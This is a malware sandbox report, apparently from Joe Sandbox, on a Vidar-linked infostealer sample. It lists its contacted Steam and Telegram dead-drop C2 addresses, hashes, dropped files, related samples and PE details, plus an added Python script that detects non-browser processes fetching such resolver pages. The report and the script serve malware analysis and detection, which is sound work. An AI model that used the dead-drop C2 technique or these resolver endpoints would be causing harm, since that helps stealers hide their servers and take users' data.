                                                                                                                                                                                                          https://community.cloudflare.steamstatic.com/public/javascript/prototype-1.7.js?v=npJElBnrEO6W&lnjrtdhadawt.exe, 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmp, njrtdhadawt.exe, 00000000.00000002.1551342830.00000000039B3000.00000004.00000020.00020000.00000000.sdmp, 76561199794498376[1].htm.0.drfalse
                                                                                                                                                                                                            high
                                                                                                                                                                                                            https://avatars.cloudflare.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg76561199794498376[1].htm.0.drfalse
                                                                                                                                                                                                              high
                                                                                                                                                                                                              https://t.me/njnjrtdhadawt.exe, 00000000.00000002.1551342830.00000000039B3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                high
                                                                                                                                                                                                                https://steamcommunity.com/linkfilter/?u=http%d-njrtdhadawt.exe, 00000000.00000003.1539350071.0000000003A07000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                  high
                                                                                                                                                                                                                  https://help.steampowered.com/njrtdhadawt.exe, 00000000.00000003.1539387427.00000000039C4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                    high
                                                                                                                                                                                                                    https://steamcommunity.com/profiles/76561199794498376/inventory/njrtdhadawt.exe, 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmp, njrtdhadawt.exe, 00000000.00000003.1539350071.0000000003A07000.00000004.00000020.00020000.00000000.sdmp, njrtdhadawt.exe, 00000000.00000002.1551342830.00000000039B3000.00000004.00000020.00020000.00000000.sdmp, 76561199794498376[1].htm.0.drfalse
                                                                                                                                                                                                                      high
URL: https://api.steampowered.com/
  Source: njrtdhadawt.exe, 00000000.00000003.1539387427.00000000039C4000.00000004.00000020.00020000.00000000.sdmp
  Malicious: false | Reputation: high
URL: http://store.steampowered.com/account/cookiepreferences/
  Source: njrtdhadawt.exe, 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmp; njrtdhadawt.exe, 00000000.00000003.1539387427.00000000039DB000.00000004.00000020.00020000.00000000.sdmp; njrtdhadawt.exe, 00000000.00000002.1551342830.00000000039B3000.00000004.00000020.00020000.00000000.sdmp; 76561199794498376[1].htm.0.dr
  Malicious: false | Reputation: high
URL: https://community.cloudflare.steamstatic.com/public/javascript/promo/stickers.js?v=iGFW_JMULCcZ&
  Source: njrtdhadawt.exe, 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmp; njrtdhadawt.exe, 00000000.00000002.1551342830.00000000039B3000.00000004.00000020.00020000.00000000.sdmp; 76561199794498376[1].htm.0.dr
  Malicious: false | Reputation: high
URL: https://store.steampowered.com/mobile
  Source: njrtdhadawt.exe, 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmp; njrtdhadawt.exe, 00000000.00000003.1539350071.0000000003A07000.00000004.00000020.00020000.00000000.sdmp; njrtdhadawt.exe, 00000000.00000002.1551342830.00000000039B3000.00000004.00000020.00020000.00000000.sdmp; 76561199794498376[1].htm.0.dr
  Malicious: false | Reputation: high
URL (as extracted, fused with adjacent strings): https://t.me/asg7rdidr7ffsqlo.dllMozilla/5.0
  Source: njrtdhadawt.exe
  Malicious: false | Reputation: high
URL: https://steamcommunity.com/
  Source: 76561199794498376[1].htm.0.dr
  Malicious: false | Reputation: high
URL: https://community.cloudflare.steamstatic.com/public/javascript/applications/community/main.js?v=Cx79
  Source: njrtdhadawt.exe, 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmp; njrtdhadawt.exe, 00000000.00000003.1539350071.0000000003A07000.00000004.00000020.00020000.00000000.sdmp; njrtdhadawt.exe, 00000000.00000002.1551342830.00000000039B3000.00000004.00000020.00020000.00000000.sdmp; 76561199794498376[1].htm.0.dr
  Malicious: false | Reputation: high
IP | Domain | Country | ASN | ASN Name | Malicious
104.102.49.254 | steamcommunity.com | United States | 16625 | AKAMAI-ASUS | false
149.154.167.99 | t.me | United Kingdom | 62041 | TELEGRAMRU | false
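Both contacted addresses are shared front ends (an Akamai edge for steamcommunity.com and Telegram's own range for t.me) that serve every client, which is why the report marks them non-malicious even though the sample used them. The signal in this analysis is elsewhere: a freshly dropped executable, not a browser, fetched one specific Steam profile (76561199794498376) and a Telegram channel page, the dead-drop pattern Vidar uses to retrieve its real C2. The Python script below is an added example, not part of the Joe Sandbox report, that applies that check to constructed proxy-log lines. The log format, the process names other than njrtdhadawt.exe and the browser allow-list are assumptions; the IPs and the Steam profile ID come from the report's network tables, and the Telegram channel token is the start of the t.me string found in memory, whose exact end is an assumption because that string is fused with its neighbours.

```python
"""Flag dead-drop-resolver lookups (Steam profile / Telegram channel pages)
made by non-browser processes, over constructed proxy-log lines."""
import re
from dataclasses import dataclass
from typing import List, Optional
from urllib.parse import urlparse

# Constructed log lines (not from the report): "<process image> <dest IP> <URL>".
# IPs and the Steam profile ID are taken from the report's network tables; the
# Telegram channel token is assumed to end where the memory string fuses with
# its neighbours.
SAMPLE_LOG = """
njrtdhadawt.exe 104.102.49.254 https://steamcommunity.com/profiles/76561199794498376
njrtdhadawt.exe 149.154.167.99 https://t.me/asg7rdidr7ffsq
chrome.exe      104.102.49.254 https://steamcommunity.com/profiles/76561199794498376
chrome.exe      104.102.49.254 https://store.steampowered.com/mobile
njrtdhadawt.exe 104.102.49.254 https://store.steampowered.com/account/cookiepreferences/
firefox.exe     149.154.167.99 https://t.me/telegram
"""

# Assumed allow-list: processes expected to fetch Steam and Telegram web pages.
BROWSERS = {"chrome.exe", "firefox.exe", "msedge.exe", "iexplore.exe",
            "steam.exe", "steamwebhelper.exe", "telegram.exe"}

# Path shapes of the two dead-drop page types: a Steam profile addressed by a
# 17-digit SteamID64, and a public Telegram channel page.
DDR_PATTERNS = [
    ("steamcommunity.com", re.compile(r"^/profiles/\d{17}/?$")),
    ("t.me", re.compile(r"^/[A-Za-z0-9_]{5,32}/?$")),
]


@dataclass
class Alert:
    process: str
    url: str
    indicator: str  # host + path: the part worth blocking or hunting on
    ip: str         # shared CDN / Telegram front-end address: context only


def classify(process: str, ip: str, url: str) -> Optional[Alert]:
    """Return an Alert when a non-browser process fetches a dead-drop page."""
    parsed = urlparse(url)
    host = (parsed.hostname or "").lower()
    for domain, pattern in DDR_PATTERNS:
        if host == domain and pattern.match(parsed.path):
            if process.lower() in BROWSERS:
                return None  # ordinary user traffic to the same host and IP
            return Alert(process, url, f"{host}{parsed.path.rstrip('/')}", ip)
    return None


def scan(log_text: str) -> List[Alert]:
    """Parse the three-column log format and classify every line."""
    alerts = []
    for line in log_text.splitlines():
        fields = line.split(None, 2)
        if len(fields) != 3:
            continue  # blank or malformed line
        alert = classify(*fields)
        if alert:
            alerts.append(alert)
    return alerts


def indicators(alerts: List[Alert]) -> List[str]:
    """Path-level IOCs to block; deduplicated, order preserved."""
    return list(dict.fromkeys(a.indicator for a in alerts))


if __name__ == "__main__":
    found = scan(SAMPLE_LOG)
    for a in found:
        print(f"ALERT {a.process} -> {a.indicator} (via {a.ip})")
    print("block:", indicators(found))
```

Only the two njrtdhadawt.exe requests to the profile and channel pages raise alerts; the same profile fetched by chrome.exe and the sample's own requests to store.steampowered.com do not. Block or hunt on the path-level indicator and carry the IP in the alert as context only: as the associated-sample tables further down show, 104.102.49.254 and 149.154.167.99 are shared by many unrelated samples and by ordinary Steam and Telegram traffic.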
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1575809
Start date and time: 2024-12-16 10:43:50 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 5m 39s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 17
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: njrtdhadawt.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@6/3@2/2
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 48
• Number of non-executed functions: 168
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, sppsvc.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
• Excluded IPs from analysis (whitelisted): 13.107.246.63, 20.109.210.53
• Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed; the report is missing behavior information
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• VT rate limit hit for: njrtdhadawt.exe
Time | Type | Description
06:11:52 | API Interceptor | 1x Sleep call for process: njrtdhadawt.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
104.102.49.254 | http://gtm-cn-j4g3qqvf603.steamproxy1.com/ | malicious | Unknown | www.valvesoftware.com/legal.htm
149.154.167.99 | http://xn--r1a.website/s/ogorodru | malicious | Unknown | telegram.org/img/favicon.ico
149.154.167.99 | http://cryptorabotakzz.com/ | malicious | Unknown | telegram.org/
149.154.167.99 | http://cache.netflix.com.id1.wuush.us.kg/ | malicious | Unknown | telegram.org/dl?tme=fe3233c08ff79d4814_5062105595184761217
149.154.167.99 | http://investors.spotify.com.sg2.wuush.us.kg/ | malicious | Unknown | telegram.org/
149.154.167.99 | http://bekaaviator.kz/ | malicious | Unknown | telegram.org/
149.154.167.99 | http://telegramtw1.org/ | malicious | Unknown | telegram.org/?setln=pl
149.154.167.99 | http://makkko.kz/ | malicious | Unknown | telegram.org/
149.154.167.99 | http://telegram.dog | malicious | Unknown | telegram.dog/
149.154.167.99 | LnSNtO8JIa.exe | malicious | Cinoshi Stealer | t.me/cinoshibot
149.154.167.99 | jtfCFDmLdX.exe | malicious | Gurcu Stealer, PrivateLoader, RedLine, RisePro Stealer, SmokeLoader, zgRAT | t.me/cinoshibot
Match | Associated Sample Name / URL | Detection | Threat Name | Context
t.me | T0x859fNfn.exe | malicious | Vidar | 149.154.167.99
t.me | file.exe | malicious | LummaC, Amadey, Cryptbot, Vidar, Xmrig | 149.154.167.99
t.me | https://zde.soundestlink.com/ce/c/675fab7ba82aca38b8d991e6/675fabf585cd17d1e3e2bb78/675fac13057112d43b540576?signature=da009f44f7cd45aeae4fbb5addf15ac91fbf725bb5e9405183f25bf1db8c8baa | malicious | Unknown | 104.26.10.61
t.me | file.exe | malicious | Amadey, Cryptbot, LummaC Stealer, Vidar, Xmrig | 149.154.167.99
t.me | lem.exe | malicious | Vidar | 149.154.167.99
t.me | Setup.msi | malicious | Vidar | 149.154.167.99
t.me | file.exe | malicious | PureCrypter, LummaC, Amadey, Cryptbot, LummaC Stealer, PureLog Stealer, Vidar | 149.154.167.99
t.me | file.exe | malicious | LummaC, Amadey, LummaC Stealer, Stealc, Vidar, Xmrig | 149.154.167.99
t.me | file.exe | malicious | ScreenConnect Tool, Amadey, LummaC Stealer, Vidar, XWorm, Xmrig | 149.154.167.99
t.me | file.exe | malicious | Amadey, LummaC Stealer, Stealc, Vidar, Xmrig | 149.154.167.99
steamcommunity.com | file.exe | malicious | LummaC, Amadey, Cryptbot, LummaC Stealer, Stealc, Xmrig | 23.55.153.106
steamcommunity.com | file.exe | malicious | LummaC, Amadey, Cryptbot, Vidar, Xmrig | 104.102.49.254
steamcommunity.com | file.exe | malicious | LummaC, Amadey, LummaC Stealer, Stealc | 23.55.153.106
steamcommunity.com | file.exe | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar | 23.55.153.106
steamcommunity.com | wN8pQhRNnu.exe | malicious | LummaC | 23.55.153.106
steamcommunity.com | AZCFTWko2q.exe | malicious | LummaC | 23.55.153.106
steamcommunity.com | I37faEaz1K.exe | malicious | LummaC | 23.55.153.106
steamcommunity.com | YbJEkgZ4z5.exe | malicious | LummaC | 23.55.153.106
steamcommunity.com | 3cb2b5U8BR.exe | malicious | LummaC | 23.55.153.106
steamcommunity.com | afXf6ZiYTT.exe | malicious | LummaC |
                                                                                                                                                                                                                                    • 23.55.153.106
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
Match: TELEGRAMRU
T0x859fNfn.exe | Get hash | malicious | Vidar | Browse
  • 149.154.167.99
SWIFT091816-24_pdf.exe | Get hash | malicious | GuLoader, MassLogger RAT | Browse
  • 149.154.167.220
REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe | Get hash | malicious | GuLoader, MassLogger RAT | Browse
  • 149.154.167.220
file.exe | Get hash | malicious | LummaC, Amadey, Cryptbot, Vidar, Xmrig | Browse
  • 149.154.167.99
file.exe | Get hash | malicious | Amadey, Cryptbot, LummaC Stealer, Vidar, Xmrig | Browse
  • 149.154.167.99
lem.exe | Get hash | malicious | Vidar | Browse
  • 149.154.167.99
Setup.msi | Get hash | malicious | Vidar | Browse
  • 149.154.167.99
file.exe | Get hash | malicious | PureCrypter, LummaC, Amadey, Cryptbot, LummaC Stealer, PureLog Stealer, Vidar | Browse
  • 149.154.167.99
SWIFT09181-24_pdf.exe | Get hash | malicious | GuLoader, MassLogger RAT | Browse
  • 149.154.167.220
file.exe | Get hash | malicious | LummaC, Amadey, LummaC Stealer, Stealc, Vidar, Xmrig | Browse
  • 149.154.167.99
Match: AKAMAI-ASUS
file.exe | Get hash | malicious | LummaC, Amadey, Cryptbot, Vidar, Xmrig | Browse
  • 104.102.49.254
ppc.elf | Get hash | malicious | Unknown | Browse
  • 23.59.85.230
m68k.elf | Get hash | malicious | Unknown | Browse
  • 104.116.165.114
sparc.elf | Get hash | malicious | Unknown | Browse
  • 23.192.60.185
mips.elf | Get hash | malicious | Unknown | Browse
  • 104.84.160.204
spc.elf | Get hash | malicious | Unknown | Browse
  • 23.74.215.158
arm5.elf | Get hash | malicious | Unknown | Browse
  • 104.93.240.58
bot.arm.elf | Get hash | malicious | Mirai | Browse
  • 95.100.63.198
armv4l.elf | Get hash | malicious | Mirai | Browse
  • 23.50.102.44
rebirth.arm5.elf | Get hash | malicious | Mirai, Okiru | Browse
  • 104.105.175.143
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
Match: 37f463bf4616ecd445d4a1937da06e19
T0x859fNfn.exe | Get hash | malicious | Vidar | Browse
  • 104.102.49.254
  • 149.154.167.99
InvoiceNr274728.pdf.lnk | Get hash | malicious | Unknown | Browse
  • 104.102.49.254
  • 149.154.167.99
A6IuJ5NneS.lnk | Get hash | malicious | LummaC | Browse
  • 104.102.49.254
  • 149.154.167.99
KlarnaInvoice229837.pdf.lnk | Get hash | malicious | LummaC | Browse
  • 104.102.49.254
  • 149.154.167.99
Arrival Notice.vbs | Get hash | malicious | Remcos, GuLoader | Browse
  • 104.102.49.254
  • 149.154.167.99
SWIFT091816-24_pdf.exe | Get hash | malicious | GuLoader, MassLogger RAT | Browse
  • 104.102.49.254
  • 149.154.167.99
REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe | Get hash | malicious | GuLoader, MassLogger RAT | Browse
  • 104.102.49.254
  • 149.154.167.99
file.exe | Get hash | malicious | LummaC, Amadey, Cryptbot, Vidar, Xmrig | Browse
  • 104.102.49.254
  • 149.154.167.99
file.exe | Get hash | malicious | Amadey, Cryptbot, LummaC Stealer, Vidar, Xmrig | Browse
  • 104.102.49.254
  • 149.154.167.99
c2.hta | Get hash | malicious | XWorm | Browse
  • 104.102.49.254
  • 149.154.167.99
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
Match: C:\ProgramData\chrome.dll
Xg0OdI1VqO.exe | Get hash | malicious | Stealc, Vidar | Browse
A3W2CpXxiO.exe | Get hash | malicious | Stealc, Vidar | Browse
QkBj8CevLU.exe | Get hash | malicious | Stealc, Vidar | Browse
file.exe | Get hash | malicious | PureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, Vidar | Browse
file.exe | Get hash | malicious | LummaC, Amadey, Cryptbot, LummaC Stealer, Stealc, Vidar | Browse
file.exe | Get hash | malicious | LummaC, Amadey, LummaC Stealer, Stealc, Vidar | Browse
file.exe | Get hash | malicious | PureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, Vidar | Browse
file.exe | Get hash | malicious | LummaC, Amadey, LummaC Stealer, Stealc, Vidar | Browse
file.exe | Get hash | malicious | LummaC, Amadey, LummaC Stealer, Stealc, Vidar | Browse
file.exe | Get hash | malicious | PureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, Vidar | Browse
                                                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\njrtdhadawt.exe
                                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):692736
                                                                                                                                                                                                                                                        Entropy (8bit):6.304379785339226
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:12288:Kk5nGNLFzxC+gej5yNcTN+pt+tLK75PL2rn65hYVKKuKOvy/j3t:KMGNL/geFyNcTN+jv75TQn652VBuNyb
                                                                                                                                                                                                                                                        MD5:EDA18948A989176F4EEBB175CE806255
                                                                                                                                                                                                                                                        SHA1:FF22A3D5F5FB705137F233C36622C79EAB995897
                                                                                                                                                                                                                                                        SHA-256:81A4F37C5495800B7CC46AEA6535D9180DADB5C151DB6F1FD1968D1CD8C1EEB4
                                                                                                                                                                                                                                                        SHA-512:160ED9990C37A4753FC0F5111C94414568654AFBEDC05308308197DF2A99594F2D5D8FE511FD2279543A869ED20248E603D88A0B9B8FB119E8E6131B0C52FF85
                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 75%
                                                                                                                                                                                                                                                        Joe Sandbox View:
                                                                                                                                                                                                                                                        • Filename: Xg0OdI1VqO.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                        • Filename: A3W2CpXxiO.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                        • Filename: QkBj8CevLU.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                        • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                        • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                        • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                        • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                        • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                        • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                        • Filename: file.exe, Detection: malicious, Browse
Reputation:moderate, very likely benign file
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......s,.>7M.m7M.m7M.m|5.l<M.m|5.l.M.m|5.l#M.m'..l"M.m'..l'M.m'..l.M.m|5.l:M.m7M.m.M.m7M.mlM.m...l6M.m...l6M.mRich7M.m........................PE..L......g.........."!...)............P.....................................................@..........................\..l...<].................................. 8...(..T....................(......@'..@............................................text............................... ..`.rdata..zV.......X..................@..@.data...T....p.......N..............@....reloc.. 8.......:...X..............@..B........................................................................................................................................................................................................................................................................................................................................
Process:C:\Users\user\Desktop\njrtdhadawt.exe
File Type:HTML document, Unicode text, UTF-8 text, with very long lines (3254)
Category:dropped
Size (bytes):35543
Entropy (8bit):5.372854743758115
Encrypted:false
SSDEEP:768:Y5pq/Ku4fmBC5ReOpltDzQlF1aXfsW9l+X9hJYFn5OMF5CBHxaXfsW9l+X9hJYMd:Y58/Ku4fmBC5ReOp/Da1aXfsW9l+X9hp
MD5:A86E8C36D424CCE50A45C1EDDE7D4204
SHA1:CECF76856509450F3AC66BF381B2CDB7DC0FCD8A
SHA-256:1C72EE57FC350FC53335F4BA5D6154CE7C9D84EDE4B6831A333F10E57C1E9EA8
SHA-512:747E713A93C748619FF2EACA90703F33FDDFEDFCE4BE393D3108D8E9DB2A5346104A6274DFFC11D9F2B270CA0A866D109BCF3F42C477CC958A05AC1ADF83127D
Malicious:false
Reputation:low
Preview:<!DOCTYPE html>.<html class=" responsive" lang="en">.<head>..<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">....<meta name="viewport" content="width=device-width,initial-scale=1">...<meta name="theme-color" content="#171a21">...<title>Steam Community :: 76561199794498376</title>..<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon">.......<link href="https://community.cloudflare.steamstatic.com/public/shared/css/motiva_sans.css?v=nc69vwog8R9p&amp;l=english&amp;_cdn=cloudflare" rel="stylesheet" type="text/css">.<link href="https://community.cloudflare.steamstatic.com/public/shared/css/buttons.css?v=G3UTKgHH4xLD&amp;l=english&amp;_cdn=cloudflare" rel="stylesheet" type="text/css">.<link href="https://community.cloudflare.steamstatic.com/public/shared/css/shared_global.css?v=bpFp7zU77IKn&amp;l=english&amp;_cdn=cloudflare" rel="stylesheet" type="text/css">.<link href="https://community.cloudflare.steamstatic.com/public/css/globalv2.css?v=i_iuPUaT8LXN&amp;l=e
Process:C:\Users\user\Desktop\njrtdhadawt.exe
File Type:Non-ISO extended-ASCII text, with very long lines (65536), with no line terminators
Category:dropped
Size (bytes):1048575
Entropy (8bit):0.0
Encrypted:false
SSDEEP:3:/7/f:D
MD5:143591D493573B46106594932F98FC9F
SHA1:8FCF324035655AA34A04134A35F3B196DF3EE06C
SHA-256:74595DEBBBEB81C448318E93C5391D4E7A4445039A69E4F28061A25F505660A6
SHA-512:8D7DB33C6C717BFA96E863664D9BA77C80D28628572453070BAD6007CA1A5D34B7570E89099313696AE9A9167EBBA034F2876BB2A47517D3E5B718677F274129
Malicious:false
Reputation:low
Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
File type:PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):6.442437847034493
TrID:
• Win32 Executable (generic) a (10002005/4) 99.55%
• Win32 EXE PECompact compressed (generic) (41571/9) 0.41%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:njrtdhadawt.exe
File size:965'632 bytes
MD5:96e4917ea5d59eca7dd21ad7e7a03d07
SHA1:28c721effb773fdd5cb2146457c10b081a9a4047
SHA256:cab6c398667a4645b9ac20c9748f194554a76706047f124297a76296e3e7a957
SHA512:3414450d1a200ffdcc6e3cb477a0a11049e5e86e8d15ae5b8ed3740a52a0226774333492279092134364460b565a25a7967b987f2304355ecfd5825f86e61687
SSDEEP:24576:ajfMVHefX7eO2FwYPMGNL/geFyNcTN+jv75TQn652VBuNyb2i:oEQreO8wRGJtF4ch+jvNm0Nyb2
TLSH:4A259D02BB809A37D60A1371205FE3669B36A4645703CFD7A7C899747DE63C26E3836D
File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......S9Hp.X&#.X&#.X&#x..#.X&#x..#.X&#x..#(X&#. .#.X&#. .#.X&#.!'".X&#.X'#.X&#x..#.X&#x..#.X&#Rich.X&#................PE..L...F..g...
Icon Hash:00928e8e8686b000
Entrypoint:0x417f30
Entrypoint Section:.text
Digitally signed:false
Imagebase:0x400000
Subsystem:windows gui
Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
DLL Characteristics:DYNAMIC_BASE, NO_ISOLATION, TERMINAL_SERVER_AWARE
Time Stamp:0x671CF146 [Sat Oct 26 13:40:22 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:5
OS Version Minor:1
File Version Major:5
File Version Minor:1
Subsystem Version Major:5
Subsystem Version Minor:1
Import Hash:dae99f55715d10799c7a5f3e0cd9d13d
Instruction
je 00007F6CD0519995h
jne 00007F6CD0519993h
mov eax, FEAC1EE8h
push dword ptr [ebx+eax+75h]
add dword ptr [eax+000181E8h], edi
add byte ptr [ebx+eax+75h], dh
add dword ptr [eax-016E6D18h], edi
push dword ptr [ebx+eax+75h]
add dword ptr [eax-016CE318h], edi
push dword ptr [ebx+eax+75h]
add dword ptr [eax-016CED18h], edi
push dword ptr [ebx+eax+75h]
add dword ptr [eax-016CF718h], edi
push dword ptr [ebx+eax+75h]
add dword ptr [eax-016AFB18h], edi
push dword ptr [ebx+eax+75h]
add dword ptr [eax-016D0B18h], edi
push dword ptr [ebx+eax+75h]
add dword ptr [eax-016D1518h], edi
push dword ptr [ebx+eax+75h]
add dword ptr [eax-016D1F18h], edi
push dword ptr [ebx+eax+75h]
add dword ptr [eax-016B0B18h], edi
push dword ptr [ebx+eax+75h]
add dword ptr [eax-016D3318h], edi
push dword ptr [ebx+eax+75h]
add dword ptr [eax-016D3D18h], edi
push dword ptr [ebx+eax+75h]
add dword ptr [eax-016D4718h], edi
push dword ptr [ebx+eax+75h]
add dword ptr [eax-016ADC18h], edi
push dword ptr [ebx+eax+75h]
add dword ptr [eax-016D5B18h], edi
push dword ptr [ebx+eax+75h]
add dword ptr [eax-016D6518h], edi
push dword ptr [ebx+eax+75h]
add dword ptr [eax-016D6F18h], edi
jmp far eax
insd
xchg eax, esi
Programming Language:
• [C++] VS2010 build 30319
• [ASM] VS2010 build 30319
• [ C ] VS2010 build 30319
• [ C ] VS2008 SP1 build 30729
• [IMP] VS2008 SP1 build 30729
• [LNK] VS2010 build 30319
Data directories:

Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x3ac78 | 0xdc | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x2fa000 | 0xb0 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x2fb000 | 0x32d8 | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2f000 | 0x2a8 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Sections:

Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x2dd65 | 0x2de00 | e8aa6c337ce9c027228e60d7c8a3e586 | False | 0.5147468920299727 | Matlab v4 mat-file (little endian) 6iB, numeric, rows 4386131, columns 0 | 6.470692539203612 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rdata | 0x2f000 | 0xcb2a | 0xcc00 | 4424ebd1db484b4743a8763a00ba57a5 | False | 0.6031901041666666 | data | 6.370843450493868 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x3c000 | 0x2bdc6c | 0xabc00 | 0a34f19411c6b7f3b8586a7fb3bcf2d4 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x2fa000 | 0xb0 | 0x200 | 3371c2710a84b430e78e8763896f0c7b | False | 0.279296875 | data | 4.107998032934072 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x2fb000 | 0x4eba | 0x5000 | 9d8cb2b8ea37e1e9d04750006146387f | False | 0.51826171875 | data | 5.16752082657315 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Resources:

Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_MANIFEST | 0x2fa058 | 0x56 | ASCII text, with CRLF line terminators | English | United States | 1.0232558139534884
Imports:

DLL | Import
msvcrt.dll | strncpy, malloc, _wtoi64, ??_V@YAXPAX@Z, atexit, strcpy_s, memchr, strchr, strtok_s, ??_U@YAPAXI@Z, _time64, srand, rand, memmove, __CxxFrameHandler3
